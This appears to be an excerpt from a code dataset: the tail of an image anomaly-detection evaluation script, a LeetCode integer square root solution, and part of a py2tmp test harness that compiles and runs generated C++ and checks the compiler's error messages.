        # calculate per-pixel level ROCAUC
        fpr, tpr, _ = roc_curve(gt_mask.flatten(), scores.flatten())
        per_pixel_rocauc = roc_auc_score(gt_mask.flatten(), scores.flatten())
        total_pixel_roc_auc.append(per_pixel_rocauc)
        print('pixel ROCAUC: %.3f' % (per_pixel_rocauc))

        # fig_pixel_rocauc.plot(fpr, tpr, label='%s ROCAUC: %.3f' % (class_name, per_pixel_rocauc))
        # save_dir = args.save_path + '/' + f'pictures_{args.arch}'
        # os.makedirs(save_dir, exist_ok=True)
        # plot_fig(test_imgs, scores, gt_mask_list, threshold, save_dir, class_name)

    print('Average ROCAUC: %.3f' % np.mean(total_roc_auc))
    fig_img_rocauc.title.set_text('Average image ROCAUC: %.3f' % np.mean(total_roc_auc))
    fig_img_rocauc.legend(loc="lower right")

    print('Average pixel ROCUAC: %.3f' % np.mean(total_pixel_roc_auc))
    fig_pixel_rocauc.title.set_text('Average pixel ROCAUC: %.3f' % np.mean(total_pixel_roc_auc))
    fig_pixel_rocauc.legend(loc="lower right")

    fig.tight_layout()
    fig.savefig(os.path.join(args.save_path, 'roc_curve.png'), dpi=100)
def plot_fig(test_img, scores, gts, threshold, save_dir, class_name):
    """Save one figure per test image: input, ground truth, anomaly heat map,
    binarized mask, and segmentation overlay.

    :param test_img: list of CHW images normalized with ImageNet statistics.
    :param scores: per-pixel anomaly scores, one HxW map per image
        (assumed normalized to [0, 1] by the caller -- TODO confirm).
    :param gts: list of ground-truth masks, channel-first with one channel.
    :param threshold: score cutoff used to binarize the anomaly map.
    :param save_dir: directory the figures are written into.
    :param class_name: file-name prefix for the saved figures.
    """
    num = len(scores)
    vmax = scores.max() * 255.
    vmin = scores.min() * 255.
    for i in range(num):
        img = test_img[i]
        img = denormalization(img)
        gt = gts[i].transpose(1, 2, 0).squeeze()
        heat_map = scores[i] * 255
        # Fix: binarize a fresh array instead of a view of `scores`. The
        # original mutated scores[i] in place, clobbering the caller's data.
        mask = (scores[i] > threshold).astype(scores.dtype)
        # Morphological opening removes small spurious regions.
        kernel = morphology.disk(4)
        mask = morphology.opening(mask, kernel)
        mask *= 255
        vis_img = mark_boundaries(img, mask, color=(1, 0, 0), mode='thick')
        fig_img, ax_img = plt.subplots(1, 5, figsize=(12, 3))
        fig_img.subplots_adjust(right=0.9)
        norm = matplotlib.colors.Normalize(vmin=vmin, vmax=vmax)
        for ax_i in ax_img:
            ax_i.axes.xaxis.set_visible(False)
            ax_i.axes.yaxis.set_visible(False)
        ax_img[0].imshow(img)
        ax_img[0].title.set_text('Image')
        ax_img[1].imshow(gt, cmap='gray')
        ax_img[1].title.set_text('GroundTruth')
        ax = ax_img[2].imshow(heat_map, cmap='jet', norm=norm)
        ax_img[2].imshow(img, cmap='gray', interpolation='none')
        ax_img[2].imshow(heat_map, cmap='jet', alpha=0.5, interpolation='none')
        ax_img[2].title.set_text('Predicted heat map')
        ax_img[3].imshow(mask, cmap='gray')
        ax_img[3].title.set_text('Predicted mask')
        ax_img[4].imshow(vis_img)
        ax_img[4].title.set_text('Segmentation result')
        # Shared colorbar on the right-hand edge of the figure.
        left = 0.92
        bottom = 0.15
        width = 0.015
        height = 1 - 2 * bottom
        rect = [left, bottom, width, height]
        cbar_ax = fig_img.add_axes(rect)
        cb = plt.colorbar(ax, shrink=0.6, cax=cbar_ax, fraction=0.046)
        cb.ax.tick_params(labelsize=8)
        font = {
            'family': 'serif',
            'color': 'black',
            'weight': 'normal',
            'size': 8,
        }
        cb.set_label('Anomaly Score', fontdict=font)
        fig_img.savefig(os.path.join(save_dir, class_name + '_{}'.format(i)), dpi=100)
        plt.close()
def denormalization(x):
    """Undo ImageNet normalization on a CHW image; return an HWC uint8 array."""
    imagenet_mean = np.array([0.485, 0.456, 0.406])
    imagenet_std = np.array([0.229, 0.224, 0.225])
    restored = (x.transpose(1, 2, 0) * imagenet_std + imagenet_mean) * 255.
    return restored.astype(np.uint8)
def embedding_concat(x, y):
    """Concatenate two feature maps channel-wise, where x is spatially larger.

    x (B, C1, H1, W1) is cut into s*s patches (s = H1 // H2) so each patch
    position lines up with one pixel of y (B, C2, H2, W2); channels are
    concatenated per position and the result is folded back to (H1, W1).
    """
    batch, chan_x, height_x, width_x = x.size()
    _, chan_y, height_y, width_y = y.size()
    stride = int(height_x / height_y)
    patches = F.unfold(x, kernel_size=stride, dilation=1, stride=stride)
    patches = patches.view(batch, chan_x, -1, height_y, width_y)
    merged = torch.zeros(batch, chan_x + chan_y, patches.size(2), height_y, width_y)
    for pos in range(patches.size(2)):
        merged[:, :, pos, :, :] = torch.cat((patches[:, :, pos, :, :], y), 1)
    merged = merged.view(batch, -1, height_y * width_y)
    return F.fold(merged, kernel_size=stride, output_size=(height_x, width_x), stride=stride)
# Script entry point; `main` is defined earlier in this file.
if __name__ == '__main__':
    main()
| main.py | 11,806 | device setup load model set model's intermediate outputs fig, ax = plt.subplots(1, 2, figsize=(20, 10)) fig_img_rocauc = ax[0] fig_pixel_rocauc = ax[1] extract train set features model prediction get intermediate layer outputs initialize hook outputs Embedding concat randomly select d dimension calculate multivariate Gaussian distribution cov[:, :, i] = LedoitWolf().fit(embedding_vectors[:, :, i].numpy()).covariance_ save learned distribution extract test set features model prediction get intermediate layer outputs initialize hook outputs Embedding concat randomly select d dimension calculate distance matrix upsample apply gaussian smoothing on the score map Normalization calculate image-level ROC AUC score get optimal threshold calculate per-pixel level ROCAUC fig_pixel_rocauc.plot(fpr, tpr, label='%s ROCAUC: %.3f' % (class_name, per_pixel_rocauc)) save_dir = args.save_path + '/' + f'pictures_{args.arch}' os.makedirs(save_dir, exist_ok=True) plot_fig(test_imgs, scores, gt_mask_list, threshold, save_dir, class_name) | 1,031 | en | 0.414045 |
# PROBLEM LINK:- https://leetcode.com/problems/sqrtx/
class Solution:
    def mySqrt(self, x):
        """Return the integer square root of x (floor of sqrt(x)), x >= 0.

        Uses pure integer binary search instead of the original float
        bisection: with a fixed 1e-6 epsilon the float loop stalls forever
        once the interval width drops below one ulp (very large x), and
        float rounding cannot guarantee the exact floor.
        """
        low, high = 0, x
        while low < high:
            # Bias the midpoint upward so `low = mid` always makes progress.
            mid = (low + high + 1) // 2
            if mid * mid <= x:
                low = mid
            else:
                high = mid - 1
        return low
| SEARCHING/EASY/Sqrt(x)/Code.py | 335 | PROBLEM LINK:- https://leetcode.com/problems/sqrtx/ | 51 | en | 0.728912 |
#!/usr/bin/env python3
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import json
import os
import tempfile
import unittest
import textwrap
import re
import sys
import itertools
import subprocess
from functools import wraps
import difflib
import pytest
import py2tmp_test_config as config
import typed_ast.ast3 as ast
from _py2tmp import (
ast_to_ir3,
ir3_to_ir2,
ir2_to_ir1,
ir1_to_ir0,
optimize_ir3,
optimize_ir0,
ir0_to_cpp,
ir0,
utils,
)
def pretty_print_command(command):
    """Render an argv list as a space-separated string of double-quoted words."""
    quoted_parts = ['"%s"' % part for part in command]
    return ' '.join(quoted_parts)
def add_line_numbers(source_code):
    """Prefix every line with its 1-based line number, right-aligned to the
    width of the largest line number."""
    lines = source_code.splitlines()
    width = len(str(len(lines)))
    numbered = ['%*d: %s' % (width, index, line)
                for index, line in enumerate(lines, start=1)]
    return '\n'.join(numbered)
class CommandFailedException(Exception):
    """Raised when a subprocess exits with a non-zero status.

    Carries the command line, captured stdout/stderr and the exit code so
    callers can report the failure in full.
    """

    def __init__(self, command, stdout, stderr, error_code):
        self.command = command
        self.stdout = stdout
        self.stderr = stderr
        self.error_code = error_code

    def __str__(self):
        template = textwrap.dedent('''\
            Ran command: {command}
            Exit code {error_code}
            Stdout:
            {stdout}
            Stderr:
            {stderr}
            ''')
        return template.format(command=pretty_print_command(self.command),
                               error_code=self.error_code,
                               stdout=self.stdout,
                               stderr=self.stderr)
def run_command(executable, args=None):
    """Run `executable` with `args`, echoing the command and its output.

    :return: (stdout, stderr) on success.
    :raises CommandFailedException: if the process exits with a non-zero code.
    """
    # `args=None` avoids the mutable-default-argument pitfall of the
    # original `args=[]` (harmless here, but a trap for future edits).
    if args is None:
        args = []
    command = [executable] + args
    print('Executing command:', pretty_print_command(command))
    try:
        p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
        (stdout, stderr) = p.communicate()
    except Exception as e:
        # Chain explicitly so the root cause stays visible in the traceback.
        raise Exception("While executing: %s" % command) from e
    if p.returncode != 0:
        raise CommandFailedException(command, stdout, stderr, p.returncode)
    print('Execution successful.')
    print('stdout:')
    print(stdout)
    print('')
    print('stderr:')
    print(stderr)
    print('')
    return (stdout, stderr)
def run_compiled_executable(executable):
    """Run the compiled test binary with no arguments; raises
    CommandFailedException (via run_command) on a non-zero exit code."""
    run_command(executable)
class CompilationFailedException(Exception):
    """Raised when the C++ compiler rejects a source file.

    Stores the full compiler command line plus the compiler's error output.
    """

    def __init__(self, command, error_message):
        self.command = command
        self.error_message = error_message

    def __str__(self):
        template = textwrap.dedent('''\
            Ran command: {command}
            Error message:
            {error_message}
            ''')
        return template.format(command=pretty_print_command(self.command),
                               error_message=self.error_message)
class PosixCompiler:
    """Adapter for POSIX-style compilers (g++/clang++) taken from py2tmp_test_config."""

    def __init__(self):
        self.executable = config.CXX
        self.name = config.CXX_COMPILER_NAME

    def compile_discarding_output(self, source, include_dirs, args=[]):
        """Syntax-check `source` without keeping any object file."""
        try:
            full_args = args + ['-c', source, '-o', os.path.devnull]
            self._compile(include_dirs, args=full_args)
        except CommandFailedException as e:
            # POSIX compilers report diagnostics on stderr.
            raise CompilationFailedException(e.command, e.stderr)

    def compile_and_link(self, source, include_dirs, output_file_name, args=[]):
        """Build an executable at `output_file_name` from `source`."""
        full_args = [source] + args + ['-o', output_file_name]
        self._compile(include_dirs, args=full_args)

    def _compile(self, include_dirs, args):
        # Warnings are errors; match the C++ standard used by the generated code.
        include_flags = ['-I%s' % include_dir for include_dir in include_dirs]
        full_args = ['-W', '-Wall', '-g0', '-Werror', '-std=c++11'] + include_flags + args
        run_command(self.executable, full_args)
class MsvcCompiler:
    """Adapter for the MSVC compiler taken from py2tmp_test_config."""

    def __init__(self):
        self.executable = config.CXX
        self.name = config.CXX_COMPILER_NAME

    def compile_discarding_output(self, source, include_dirs, args=[]):
        """Syntax-check `source` without linking."""
        try:
            full_args = args + ['/c', source]
            self._compile(include_dirs, args=full_args)
        except CommandFailedException as e:
            # Note that we use stdout here, unlike the POSIX adapter. MSVC
            # reports compilation warnings and errors on stdout.
            raise CompilationFailedException(e.command, e.stdout)

    def compile_and_link(self, source, include_dirs, output_file_name, args=[]):
        """Build an executable at `output_file_name` from `source`."""
        full_args = [source] + args + ['/Fe' + output_file_name]
        self._compile(include_dirs, args=full_args)

    def _compile(self, include_dirs, args):
        # Warnings are errors (/WX); /FS allows concurrent PDB writes.
        include_flags = ['-I%s' % include_dir for include_dir in include_dirs]
        full_args = ['/nologo', '/FS', '/W4', '/D_SCL_SECURE_NO_WARNINGS', '/WX'] + include_flags + args
        run_command(self.executable, full_args)
# Pick the compiler adapter matching the configured compiler, and the regex
# used to extract the user-facing error text from its diagnostics.
if config.CXX_COMPILER_NAME == 'MSVC':
    compiler = MsvcCompiler()
    py2tmp_error_message_extraction_regex = 'error C2338: (.*)'
else:
    compiler = PosixCompiler()
    py2tmp_error_message_extraction_regex = 'static.assert(.*)'
# TestCase instance used only for its assert* helper methods.
_assert_helper = unittest.TestCase()
def _create_temporary_file(file_content, file_name_suffix=''):
file_descriptor, file_name = tempfile.mkstemp(text=True, suffix=file_name_suffix)
file = os.fdopen(file_descriptor, mode='w')
file.write(file_content)
file.close()
return file_name
def _cap_to_lines(s, n):
lines = s.splitlines()
if len(lines) <= n:
return s
else:
return '\n'.join(lines[0:n] + ['...'])
def try_remove_temporary_file(filename):
    """Best-effort deletion of a temporary file; never raises on OS errors."""
    try:
        os.remove(filename)
    except OSError:
        # When running tests on Windows using Appveyor, the remove command fails for temporary files sometimes.
        # This shouldn't cause the tests to fail, so we ignore the exception and go ahead.
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit still propagate.
        pass
def expect_cpp_code_compile_error_helper(check_error_fun, tmppy_source, module_ir2, module_ir1, cxx_source):
    """Compile cxx_source expecting failure, then delegate the error check.

    :param check_error_fun: called as check_error_fun(e, error_message_lines,
           error_message_head, normalized_error_message_lines) where e is the
           CompilationFailedException raised by the compiler wrapper.
    :param tmppy_source: the TMPPy source (used only for error reporting).
    :param module_ir2: the module's IR2 (used only for error reporting).
    :param module_ir1: the module's IR1 (used only for error reporting).
    :param cxx_source: the generated C++ code that must fail to compile.
    """
    source_file_name = _create_temporary_file(cxx_source, file_name_suffix='.cpp')
    try:
        compiler.compile_discarding_output(
            source=source_file_name,
            include_dirs=[config.MPYL_INCLUDE_DIR],
            args=[])
        # Reaching this point means compilation succeeded, which is a failure
        # for this kind of test.
        pytest.fail(textwrap.dedent('''\
            The test should have failed to compile, but it compiled successfully.
            TMPPy source:
            {tmppy_source}
            TMPPy IR2:
            {tmppy_ir2}
            TMPPy IR1:
            {tmppy_ir1}
            C++ source code:
            {cxx_source}
            ''').format(tmppy_source = add_line_numbers(tmppy_source),
                        tmppy_ir2=str(module_ir2),
                        tmppy_ir1=str(module_ir1),
                        cxx_source = add_line_numbers(cxx_source)),
                    pytrace=False)
    except CompilationFailedException as e1:
        e = e1
    error_message = e.error_message
    error_message_lines = error_message.splitlines()
    # Different compilers output a different number of spaces when pretty-printing types.
    # When using libc++, sometimes std::foo identifiers are reported as std::__1::foo.
    normalized_error_message = error_message.replace(' ', '').replace('std::__1::', 'std::')
    normalized_error_message_lines = normalized_error_message.splitlines()
    error_message_head = _cap_to_lines(error_message, 40)
    check_error_fun(e, error_message_lines, error_message_head, normalized_error_message_lines)
    try_remove_temporary_file(source_file_name)
def expect_cpp_code_generic_compile_error(expected_error_regex, tmppy_source, module_ir2, module_ir1, cxx_source):
    """
    Tests that the given source produces the expected error during compilation.
    :param expected_error_regex: A regex matched (after stripping spaces) against
           each line of the compiler output, e.g.
           'NoBindingFoundForAbstractClassError<ScalerImpl>'.
    :param tmppy_source: the TMPPy source (used only for error reporting).
    :param module_ir2: the module's IR2 (used only for error reporting).
    :param module_ir1: the module's IR1 (used only for error reporting).
    :param cxx_source: the generated C++ code that must fail to compile.
    """
    # Spaces are stripped to match the normalized compiler output.
    expected_error_regex = expected_error_regex.replace(' ', '')
    def check_error(e, error_message_lines, error_message_head, normalized_error_message_lines):
        for line in normalized_error_message_lines:
            if re.search(expected_error_regex, line):
                return
        pytest.fail(
            textwrap.dedent('''\
                Expected error {expected_error} but the compiler output did not contain that.
                Compiler command line: {compiler_command}
                Error message was:
                {error_message}
                TMPPy source:
                {tmppy_source}
                TMPPy IR2:
                {tmppy_ir2}
                TMPPy IR1:
                {tmppy_ir1}
                C++ source:
                {cxx_source}
                ''').format(expected_error = expected_error_regex,
                            compiler_command=e.command,
                            tmppy_source = add_line_numbers(tmppy_source),
                            tmppy_ir2 = str(module_ir2),
                            tmppy_ir1 = str(module_ir1),
                            cxx_source = add_line_numbers(cxx_source),
                            error_message = error_message_head),
            pytrace=False)
    expect_cpp_code_compile_error_helper(check_error, tmppy_source, module_ir2, module_ir1, cxx_source)
def expect_cpp_code_compile_error(
        expected_py2tmp_error_regex,
        expected_py2tmp_error_desc_regex,
        tmppy_source,
        module_ir2,
        module_ir1,
        cxx_source):
    """
    Tests that the given source produces the expected error during compilation.
    :param expected_py2tmp_error_regex: A regex used to match the _py2tmp error type,
           e.g. 'NoBindingFoundForAbstractClassError<ScalerImpl>'.
    :param expected_py2tmp_error_desc_regex: A regex used to match the _py2tmp error description,
           e.g. 'No explicit binding was found for C, and C is an abstract class'.
    :param tmppy_source: the TMPPy source (used only for error reporting).
    :param module_ir2: the module's IR2 (used only for error reporting).
    :param module_ir1: the module's IR1 (used only for error reporting).
    :param cxx_source: the generated C++ code that must fail to compile.
    """
    if '\n' in expected_py2tmp_error_regex:
        raise Exception('expected_py2tmp_error_regex should not contain newlines')
    if '\n' in expected_py2tmp_error_desc_regex:
        raise Exception('expected_py2tmp_error_desc_regex should not contain newlines')
    # Spaces are stripped to match the normalized compiler output.
    expected_py2tmp_error_regex = expected_py2tmp_error_regex.replace(' ', '')
    def check_error(e, error_message_lines, error_message_head, normalized_error_message_lines):
        # Find the user-facing tmppy::impl::...Error<...> instantiation.
        for line_number, line in enumerate(normalized_error_message_lines):
            match = re.search('tmppy::impl::(.*Error<.*>)', line)
            if match:
                actual_py2tmp_error_line_number = line_number
                actual_py2tmp_error = match.groups()[0]
                if config.CXX_COMPILER_NAME == 'MSVC':
                    # MSVC errors are of the form:
                    #
                    # C:\Path\To\header\foo.h(59): note: see reference to class template instantiation 'tmppy::impl::MyError<X, Y>' being compiled
                    # with
                    # [
                    #     X=int,
                    #     Y=double
                    # ]
                    #
                    # So we need to parse the following few lines and use them to replace the placeholder types in the tmppy error type.
                    try:
                        replacement_lines = []
                        if normalized_error_message_lines[line_number + 1].strip() == 'with':
                            for line in itertools.islice(normalized_error_message_lines, line_number + 3, None):
                                line = line.strip()
                                if line == ']':
                                    break
                                if line.endswith(','):
                                    line = line[:-1]
                                replacement_lines.append(line)
                        for replacement_line in replacement_lines:
                            match = re.search('([A-Za-z0-9_-]*)=(.*)', replacement_line)
                            if not match:
                                raise Exception('Failed to parse replacement line: %s' % replacement_line) from e
                            (type_variable, type_expression) = match.groups()
                            actual_py2tmp_error = re.sub(r'\b' + type_variable + r'\b', type_expression, actual_py2tmp_error)
                    except Exception:
                        raise Exception('Failed to parse MSVC template type arguments')
                break
        else:
            pytest.fail(
                textwrap.dedent('''\
                    Expected error {expected_error} but the compiler output did not contain user-facing _py2tmp errors.
                    Compiler command line: {compiler_command}
                    Error message was:
                    {error_message}
                    TMPPy source:
                    {tmppy_source}
                    TMPPy IR2:
                    {tmppy_ir2}
                    TMPPy IR1:
                    {tmppy_ir1}
                    C++ source code:
                    {cxx_source}
                    ''').format(expected_error = expected_py2tmp_error_regex,
                                compiler_command = e.command,
                                tmppy_source = add_line_numbers(tmppy_source),
                                tmppy_ir2 = str(module_ir2),
                                tmppy_ir1 = str(module_ir1),
                                cxx_source = add_line_numbers(cxx_source),
                                error_message = error_message_head),
                pytrace=False)
        # Find the static_assert diagnostic carrying the error description.
        for line_number, line in enumerate(error_message_lines):
            match = re.search(py2tmp_error_message_extraction_regex, line)
            if match:
                actual_static_assert_error_line_number = line_number
                actual_static_assert_error = match.groups()[0]
                break
        else:
            pytest.fail(
                textwrap.dedent('''\
                    Expected error {expected_error} but the compiler output did not contain static_assert errors.
                    Compiler command line: {compiler_command}
                    Error message was:
                    {error_message}
                    TMPPy source:
                    {tmppy_source}
                    TMPPy IR2:
                    {tmppy_ir2}
                    TMPPy IR1:
                    {tmppy_ir1}
                    C++ source code:
                    {cxx_source}
                    ''').format(expected_error = expected_py2tmp_error_regex,
                                compiler_command=e.command,
                                tmppy_source = add_line_numbers(tmppy_source),
                                tmppy_ir2 = str(module_ir2),
                                tmppy_ir1 = str(module_ir1),
                                cxx_source = add_line_numbers(cxx_source),
                                error_message = error_message_head),
                pytrace=False)
        try:
            regex_search_result = re.search(expected_py2tmp_error_regex, actual_py2tmp_error)
        except Exception as e:
            raise Exception('re.search() failed for regex \'%s\'' % expected_py2tmp_error_regex) from e
        if not regex_search_result:
            pytest.fail(
                textwrap.dedent('''\
                    The compilation failed as expected, but with a different error type.
                    Expected _py2tmp error type: {expected_py2tmp_error_regex}
                    Error type was: {actual_py2tmp_error}
                    Expected static assert error: {expected_py2tmp_error_desc_regex}
                    Static assert was: {actual_static_assert_error}
                    Error message was:
                    {error_message}
                    TMPPy source:
                    {tmppy_source}
                    TMPPy IR2:
                    {tmppy_ir2}
                    TMPPy IR1:
                    {tmppy_ir1}
                    C++ source code:
                    {cxx_source}
                    '''.format(expected_py2tmp_error_regex = expected_py2tmp_error_regex,
                               actual_py2tmp_error = actual_py2tmp_error,
                               expected_py2tmp_error_desc_regex = expected_py2tmp_error_desc_regex,
                               actual_static_assert_error = actual_static_assert_error,
                               tmppy_source = add_line_numbers(tmppy_source),
                               tmppy_ir2 = str(module_ir2),
                               tmppy_ir1 = str(module_ir1),
                               cxx_source = add_line_numbers(cxx_source),
                               error_message = error_message_head)),
                pytrace=False)
        try:
            regex_search_result = re.search(expected_py2tmp_error_desc_regex, actual_static_assert_error)
        except Exception as e:
            raise Exception('re.search() failed for regex \'%s\'' % expected_py2tmp_error_desc_regex) from e
        if not regex_search_result:
            pytest.fail(
                textwrap.dedent('''\
                    The compilation failed as expected, but with a different error message.
                    Expected _py2tmp error type: {expected_py2tmp_error_regex}
                    Error type was: {actual_py2tmp_error}
                    Expected static assert error: {expected_py2tmp_error_desc_regex}
                    Static assert was: {actual_static_assert_error}
                    Error message:
                    {error_message}
                    TMPPy source:
                    {tmppy_source}
                    TMPPy IR2:
                    {tmppy_ir2}
                    TMPPy IR1:
                    {tmppy_ir1}
                    C++ source code:
                    {cxx_source}
                    '''.format(expected_py2tmp_error_regex = expected_py2tmp_error_regex,
                               actual_py2tmp_error = actual_py2tmp_error,
                               expected_py2tmp_error_desc_regex = expected_py2tmp_error_desc_regex,
                               actual_static_assert_error = actual_static_assert_error,
                               tmppy_source = add_line_numbers(tmppy_source),
                               tmppy_ir2 = str(module_ir2),
                               tmppy_ir1 = str(module_ir1),
                               cxx_source = add_line_numbers(cxx_source),
                               error_message = error_message_head)),
                pytrace=False)
        # 6 is just a constant that works for both g++ (<=6.0.0 at least) and clang++ (<=4.0.0 at least).
        # It might need to be changed.
        if actual_py2tmp_error_line_number > 6 or actual_static_assert_error_line_number > 6:
            pytest.fail(
                textwrap.dedent('''\
                    The compilation failed with the expected message, but the error message contained too many lines before the relevant ones.
                    The error type was reported on line {actual_py2tmp_error_line_number} of the message (should be <=6).
                    The static assert was reported on line {actual_static_assert_error_line_number} of the message (should be <=6).
                    Error message:
                    {error_message}
                    TMPPy source:
                    {tmppy_source}
                    TMPPy IR2:
                    {tmppy_ir2}
                    TMPPy IR1:
                    {tmppy_ir1}
                    C++ source code:
                    {cxx_source}
                    '''.format(actual_py2tmp_error_line_number = actual_py2tmp_error_line_number,
                               actual_static_assert_error_line_number = actual_static_assert_error_line_number,
                               tmppy_source = add_line_numbers(tmppy_source),
                               tmppy_ir2 = str(module_ir2),
                               tmppy_ir1 = str(module_ir1),
                               cxx_source = add_line_numbers(cxx_source),
                               error_message = error_message_head)),
                pytrace=False)
        for line in error_message_lines[:max(actual_py2tmp_error_line_number, actual_static_assert_error_line_number)]:
            if re.search('tmppy::impl', line):
                # Bug fix: the message was built with '+' (string concatenation),
                # leaving a literal '%s' in the output; '%' formatting was intended.
                pytest.fail(
                    'The compilation failed with the expected message, but the error message contained some metaprogramming types in the output (besides Error). Error message:\n%s' % error_message_head,
                    pytrace=False)
    expect_cpp_code_compile_error_helper(check_error, tmppy_source, module_ir2, module_ir1, cxx_source)
def expect_cpp_code_success(tmppy_source, module_ir2, module_ir1, cxx_source):
    """
    Tests that the given source compiles and runs successfully.
    :param tmppy_source: the TMPPy source (used only for error reporting).
    :param module_ir2: the module's IR2 (used only for error reporting).
    :param module_ir1: the module's IR1 (used only for error reporting).
    :param cxx_source: the generated C++ code; a trivial main() is appended
           if the code doesn't already define one.
    """
    if 'main(' not in cxx_source:
        cxx_source += textwrap.dedent('''
            int main() {
            }
            ''')
    source_file_name = _create_temporary_file(cxx_source, file_name_suffix='.cpp')
    executable_suffix = {'posix': '', 'nt': '.exe'}[os.name]
    output_file_name = _create_temporary_file('', executable_suffix)
    e = None
    try:
        compiler.compile_and_link(
            source=source_file_name,
            include_dirs=[config.MPYL_INCLUDE_DIR],
            output_file_name=output_file_name,
            args=[])
    except CommandFailedException as e1:
        e = e1
    if e:
        pytest.fail(
            textwrap.dedent('''\
                The generated C++ source did not compile.
                Compiler command line: {compiler_command}
                Error message was:
                {error_message}
                TMPPy source:
                {tmppy_source}
                TMPPy IR2:
                {tmppy_ir2}
                TMPPy IR1:
                {tmppy_ir1}
                C++ source:
                {cxx_source}
                ''').format(compiler_command=e.command,
                            tmppy_source = add_line_numbers(tmppy_source),
                            tmppy_ir2 = str(module_ir2),
                            tmppy_ir1 = str(module_ir1),
                            cxx_source = add_line_numbers(cxx_source),
                            error_message = _cap_to_lines(e.stderr, 40)),
            pytrace=False)
    try:
        run_compiled_executable(output_file_name)
    except CommandFailedException as e1:
        e = e1
    if e:
        pytest.fail(
            textwrap.dedent('''\
                The generated C++ executable did not run successfully.
                stderr was:
                {error_message}
                TMPPy source:
                {tmppy_source}
                C++ source:
                {cxx_source}
                ''').format(tmppy_source = add_line_numbers(tmppy_source),
                            cxx_source = add_line_numbers(cxx_source),
                            error_message = _cap_to_lines(e.stderr, 40)),
            pytrace=False)
    # Note that we don't delete the temporary files if the test failed. This is intentional, keeping them around helps debugging the failure.
    try_remove_temporary_file(source_file_name)
    try_remove_temporary_file(output_file_name)
def _get_function_body(f):
    """Return the dedented body of the zero-argument function `f` as a string."""
    lines, _ = inspect.getsourcelines(f)
    # Drop decorators and the `def f():` line itself.
    header = 'def %s():\n' % f.__name__
    body_lines = lines[lines.index(header) + 1:]
    # The body of some tests is a multiline string because they would otherwise
    # cause the pytest test file to fail parsing; strip the quote lines.
    if body_lines[0].strip() == "'''" and body_lines[-1].strip() == "'''":
        body_lines = body_lines[1:-1]
    return textwrap.dedent(''.join(body_lines))
def create_identifier_generator():
    """Return an endless iterator yielding 'TmppyInternal_0', 'TmppyInternal_1', ..."""
    return ('TmppyInternal_%s' % index for index in itertools.count())
def _convert_tmppy_source_to_ir(python_source, identifier_generator):
    """Parse TMPPy source and lower it to (module_ir2, module_ir1).

    The IR3 is optimized before being lowered to IR2 and then IR1.
    Raises ast_to_ir3.CompilationError on invalid TMPPy code.
    """
    filename='<unknown>'
    source_ast = ast.parse(python_source, filename)
    module_ir3 = ast_to_ir3.module_ast_to_ir3(source_ast, filename, python_source.splitlines())
    module_ir3 = optimize_ir3.optimize_module(module_ir3)
    module_ir2 = ir3_to_ir2.module_to_ir2(module_ir3, identifier_generator)
    module_ir1 = ir2_to_ir1.module_to_ir1(module_ir2)
    return module_ir2, module_ir1
def _convert_to_cpp_expecting_success(tmppy_source):
    """Convert TMPPy source all the way to C++, failing the test on errors.

    Returns (module_ir2, module_ir1, cpp_source) where cpp_source is the
    clang-formatted generated header.
    """
    identifier_generator = create_identifier_generator()
    try:
        module_ir2, module_ir1 = _convert_tmppy_source_to_ir(tmppy_source, identifier_generator)
        e = None
    except ast_to_ir3.CompilationError as e1:
        e = e1
    if e:
        pytest.fail(
            textwrap.dedent('''\
                The conversion from TMPPy to C++ failed.
                stderr was:
                {error_message}
                TMPPy source:
                {tmppy_source}
                ''').format(tmppy_source = add_line_numbers(tmppy_source),
                            error_message = e.args[0]),
            pytrace=False)
    try:
        # Lower IR1 to IR0, optimize, and render the final C++ header.
        header = ir1_to_ir0.module_to_ir0(module_ir1, identifier_generator)
        header = optimize_ir0.optimize_header(header, identifier_generator, verbose=False)
        cpp_source = ir0_to_cpp.header_to_cpp(header, identifier_generator)
        cpp_source = utils.clang_format(cpp_source)
        return module_ir2, module_ir1, cpp_source
    except ast_to_ir3.CompilationError as e1:
        e = e1
    if e:
        pytest.fail(
            textwrap.dedent('''\
                The conversion from TMPPy to C++ failed.
                stderr was:
                {error_message}
                TMPPy source:
                {tmppy_source}
                TMPPy IR2:
                {tmppy_ir2}
                TMPPy IR1:
                {tmppy_ir1}
                ''').format(tmppy_source=add_line_numbers(tmppy_source),
                            tmppy_ir2=str(module_ir2),
                            tmppy_ir1=str(module_ir1),
                            error_message=e.args[0]),
            pytrace=False)
def assert_compilation_succeeds(extra_cpp_prelude=''):
    """Test decorator factory: the decorated function's body is TMPPy source
    that must convert to C++, compile and run successfully.

    :param extra_cpp_prelude: C++ code prepended to the generated source.
    """
    # Renamed the inner function from `eval`, which shadowed the builtin.
    def decorator(f):
        @wraps(f)
        def wrapper():
            tmppy_source = _get_function_body(f)
            module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
            expect_cpp_code_success(tmppy_source, module_ir2, module_ir1, extra_cpp_prelude + cpp_source)
        return wrapper
    return decorator
def assert_code_optimizes_to(expected_cpp_source: str):
    """Test decorator factory: the decorated function's body is TMPPy source
    whose generated (optimized) C++ must equal expected_cpp_source.

    expected_cpp_source must start with a newline so the expected code reads
    as a clean multiline literal; that first newline is stripped before the
    comparison.
    """
    # Renamed the inner function from `eval`, which shadowed the builtin.
    def decorator(f):
        @wraps(f)
        def wrapper():
            tmppy_source = _get_function_body(f)
            module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
            assert expected_cpp_source[0] == '\n'
            if cpp_source != expected_cpp_source[1:]:
                pytest.fail(
                    textwrap.dedent('''\
                        The generated code didn't match the expected code.
                        TMPPy source:
                        {tmppy_source}
                        TMPPy IR2:
                        {tmppy_ir2}
                        TMPPy IR1:
                        {tmppy_ir1}
                        Generated C++ source:
                        {cpp_source}
                        Expected C++ source:
                        {expected_cpp_source}
                        Diff:
                        {cpp_source_diff}
                        ''').format(tmppy_source=add_line_numbers(tmppy_source),
                                    tmppy_ir2=str(module_ir2),
